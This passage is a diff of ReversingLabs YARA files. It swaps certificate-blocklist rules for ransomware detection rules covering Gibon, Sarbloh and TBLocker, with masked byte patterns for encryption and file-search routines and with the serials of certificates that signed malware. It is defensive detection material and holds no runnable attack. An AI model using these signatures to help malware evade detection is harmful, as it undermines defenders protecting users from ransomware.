68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 8B F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? + B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? F3 A5 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 + } + $encrypt_files_p2 = { + 8B 86 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 89 85 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 + 86 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 86 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 7C ?? + 6A ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 + FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B F4 8B CA 33 C0 + C7 46 ?? ?? ?? ?? ?? 8D 79 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 66 8B 01 83 C1 ?? 66 85 + C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 53 8B 1D ?? ?? ?? ?? FF D3 6A ?? 8D 45 ?? + 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B + F8 89 BD ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? F3 A5 8B 45 ?? 8D 8D ?? ?? ?? ?? 50 68 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 + FF D3 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "isonet ag" and pe.signatures[i].serial=="75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $find_drives and $find_files and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Gibon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Gibon ransomware." author = "ReversingLabs" - id = "541a169e-a263-5901-9d8e-768306b8b8ba" - date = "2023-11-08" - modified = "2023-11-08" + id = "3f1a5bee-8fc0-5596-b898-e97073731930" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L189-L205" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Gibon.yara#L1-L122" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cace0f35529307487f39aace6ae8989c7b878f82ebe890b256dfac563551a099" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Gibon" + tc_detection_factor = 5 importance = 25 + strings: + $remote_server_connection_1_0 = { + 53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ?? + ?? 64 A1 ?? ?? ?? ?? 50 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 + ?? 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? BA ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? + ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? + 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 B9 ?? ?? ?? ?? 83 FE ?? 75 ?? BA ?? ?? ?? ?? E9 + ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? + FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 8B + 3D ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 8B 43 ?? + 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? + ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 8D 43 ?? FF 73 ?? 0F 43 43 ?? 8D 8D ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 + } + $remote_server_connection_1_1 = { + E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? + ?? ?? ?? 8B 53 ?? 8D 4B ?? 83 FA ?? 0F 43 4B ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 90 8A 01 + 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 8D 43 ?? 6A ?? 83 FA ?? 51 0F 43 43 ?? 50 56 FF 15 + ?? ?? ?? ?? 85 C0 79 ?? FF D7 50 51 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? 8B C8 E8 ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? + 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? BE ?? ?? ?? ?? 8B 43 ?? 83 F8 ?? 72 ?? 8B 4B ?? 40 3D ?? ?? ?? ?? 72 + ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 + ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8B 4D + ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3 + } + $encryption_loop_1_0 = { + 66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 8B 51 ?? 83 CA ?? + 8B C2 83 C8 ?? 83 79 ?? ?? 0F 45 C2 50 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 C0 0F 85 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 C7 45 ?? ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? 83 CB ?? 68 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 8B D7 8B 9D ?? ?? ?? ?? 83 CB ?? 83 7F ?? ?? 89 9D ?? ?? ?? ?? 89 + 9D ?? ?? ?? ?? 72 ?? 8B 17 83 78 ?? ?? 8B C8 72 ?? 8B 08 8B 70 ?? 3B 77 ?? 75 ?? 85 + F6 0F 84 + } + $encryption_loop_1_1 = { + 66 8B 01 66 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EE ?? 75 ?? C6 85 ?? ?? ?? ?? ?? EB ?? + 32 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? C6 85 ?? ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? + 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? + ?? ?? ?? 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? + 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? E8 ?? ?? ?? ?? 32 C0 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 32 C0 C7 45 ?? ?? ?? ?? ?? 75 ?? 83 E3 ?? 8D 8D ?? ?? ?? ?? 89 9D ?? ?? + ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 51 FF B5 ?? ?? ?? ?? BA + ?? ?? ?? ?? C6 45 ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 8D + 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 + ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 + } + $encryption_loop_1_2 = { + 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? + ?? ?? ?? C3 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 FF B5 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E + 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 51 FF B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 51 + 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 + C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 69 0F ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? + ?? ?? BA ?? ?? ?? ?? 03 48 ?? 8D 85 ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 85 C0 74 ?? BA + ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $encryption_loop_1_3 = { + 69 37 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 03 70 ?? E8 ?? ?? ?? ?? 8B 95 ?? + ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 81 CB ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 78 ?? 8D + 4A ?? 89 08 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? 8D 4A ?? 89 48 ?? + B9 ?? ?? ?? ?? F3 A5 66 A5 C7 80 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? + ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + C6 45 ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 + ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B BD ?? + ?? ?? ?? 8B 8D ?? ?? ?? ?? FF 07 8B 07 89 41 ?? 69 17 ?? ?? ?? ?? 8B 41 ?? 80 A4 02 + ?? ?? ?? ?? ?? 8B 01 48 39 07 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 + E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F + 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 + ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8A 11 8B + C8 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures[i].serial=="4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($remote_server_connection_1_0 and $remote_server_connection_1_1 and ( all of ($encryption_loop_1_*))) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Sarbloh ransomware." author = "ReversingLabs" - id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13" - date = "2023-11-08" - modified = "2023-11-08" + id = "532abd77-f091-5c54-87a3-7e8be5253efd" + date = "2021-05-21" + modified = "2021-05-21" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L207-L223" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Sarbloh" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? + ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75 + ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? + ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ?? + 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B + 8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66 + 0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? + 8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? + 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ?? + 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ?? + 8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F + 85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85 + C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? + ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84 + } + $encrypt_files_p2 = { + 8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? + FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ?? + 81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45 + ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D + 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45 + ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? + F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 + 85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? + ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 + ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A + ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ?? + 8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83 + 7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73 + ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB + } + $find_files_p1 = { + 55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D + 45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D + 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ?? + 83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50 + FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45 + ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73 + } + $find_files_p2 = { + 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB + 89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ?? + ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1 + C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE + ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Open Source Developer, zhenganjun" and pe.signatures[i].serial=="57:d7:15:3a:89:bb:f4:72:9b:e8:7f:3c:92:70:43:aa" and 1469059200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_028E1Deccf93D38Ecf396118Dfe908B4 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Tblocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TBLocker ransomware." author = "ReversingLabs" - id = "6dfb0181-299f-5a28-b647-137d75f747a6" - date = "2023-11-08" - modified = "2023-11-08" + id = "91793018-baf6-5e70-83b6-8793482c3bec" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L225-L241" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b07c797652ef19c7e0b23c3eddbbbf2700160d743d71a0005b950160474638d8" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.TBLocker.yara#L1-L85" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "81f0077655ac0e59cd8dc05be602ae500c938668bd57d3cf4a51fbff2a5b6b83" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TBLocker" + tc_detection_factor = 5 importance = 25 + strings: + $main_ransomware_function_p1 = { + 00 02 16 28 ?? ?? ?? ?? 00 02 17 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 16 28 ?? ?? ?? ?? 00 02 + 16 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? + ?? 16 FE ?? 0A 06 2C ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? 